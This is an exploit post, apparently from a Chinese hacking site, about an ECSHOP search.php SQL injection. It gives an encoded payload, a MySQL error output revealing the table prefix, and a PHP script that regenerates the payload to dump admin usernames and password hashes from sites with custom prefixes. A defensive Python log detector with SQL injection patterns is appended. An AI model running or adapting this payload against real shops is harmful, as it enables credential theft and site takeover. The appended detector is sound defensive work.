ECSHOP search exploit variant for dumping user passwords: fixing the error

2011-05-09T00:00:00
ID MYHACK58:62201130387
Type myhack58
Reporter Anonymous
Modified 2011-05-09T00:00:00

Description

Trying out an ECSHOP exploit (EXP) found online:

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxmju6ijenksbhbmqgmt0yiedst1vqiejzigdvb2rzx2lkihvuaw9uigfsbcbzzwxly3qgy29uy2f0khvzzxjfbmftzswwednhlhbhc3n3b3jklccixccpihvuaw9uihnlbgvjdcaxiyinkswxigzyb20gzwnzx2fkbwlux3vzzxijijtzoje6ijeio319

Returns: MySQL server error report: Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM ma526073ww.73ww_goods_attr WHERE 0 OR (1 AND attr_id = '1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#' AND attr_value LIKE '%1%' ) GROUP BY goods_id HAVING num= '1' ) [2] => Array ( [error] => Table 'ma526073ww.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )

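The cause is that the site's database table prefix has been changed: the EXP queries ecs_admin_user, but the tables on this site use a different prefix, so that table does not exist.

Solution: regenerate the EXP variant with the site's table prefix.

Use the following code to generate the encoded value: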

<?php
// Table prefix: defaults to ecs_, can be overridden with the "pre" request parameter
$p = "ecs_";
$p = isset($_REQUEST['pre']) ? $_REQUEST['pre'] : $p;
$arr = array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'\"\\') union select 1#\"'),1 from ".$p."admin_user#" => "1");
$exp = array("attr" => $arr);
$exp = base64_encode(serialize($exp));
//echo $exp;
?>
<textarea name="textarea" id="textarea" cols="100" rows="5"><?=$exp?></textarea>


Save the code above as x.php.

Here 73ww_ is the table prefix.

Access <http://www.xxx.com/?per=73ww_> to generate the new Base64-encoded value.
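From the defender's side, the request shape shown above (search.php with an encode parameter holding a Base64-encoded, PHP-serialized array whose attr keys end up in the SQL) can be spotted in web access logs. The following is an added example, not part of the original post; the log format, the pattern list and the sample lines are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Assumed pattern list: SQL fragments that do not belong in a serialized search filter.
# The table prefix varies per site (ecs_ and 73ww_ on this page), so match the suffix only.
SQLI = re.compile(rb"union\s+(all\s+)?select|concat\s*\(|\w*admin_user", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # assumes combined log format

def decode_param(value):
    """Base64-decode an encode= value; return None if it is not valid Base64."""
    value = value.replace(" ", "+")  # parse_qs turns '+' into a space
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None

def inspect_line(line):
    """Classify one access-log line as skip / ok / suspicious / alert."""
    m = REQUEST.search(line)
    if not m:
        return ("skip", "")
    url = urlsplit(m.group(1))
    values = parse_qs(url.query).get("encode")
    if not url.path.lower().endswith("search.php") or not values:
        return ("skip", "")
    raw = decode_param(values[0])
    if raw is None:
        return ("suspicious", "encode= is not valid Base64")
    hit = SQLI.search(raw)
    if hit:
        return ("alert", hit.group(0).decode("latin-1"))
    return ("ok", "")

def _sample(ip, serialized):
    """Build a constructed log line carrying a serialized array in encode=."""
    q = base64.b64encode(serialized.encode()).decode()
    return f'{ip} - - [09/May/2011:10:00:00 +0800] "GET /search.php?encode={q} HTTP/1.1" 200 512'

# Constructed sample input: a normal search, a marker string with SQL in an attr key,
# a malformed value, and an unrelated request.
SAMPLE_LOG = [
    _sample("198.51.100.7", 'a:1:{s:8:"keywords";s:5:"phone";}'),
    _sample("203.0.113.9", 'a:1:{s:4:"attr";a:1:{s:26:"1\') UNION ALL SELECT 1,2 #";s:1:"1";}}'),
    '203.0.113.9 - - [09/May/2011:10:00:05 +0800] "GET /search.php?encode=not*base64 HTTP/1.1" 200 512',
    '198.51.100.7 - - [09/May/2011:10:00:09 +0800] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_line(line), line.split('"')[1][:60])
```

An alert on this pattern together with "MySQL server error report" responses from search.php indicates the error reporting is also exposing the real table prefix to the requester.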
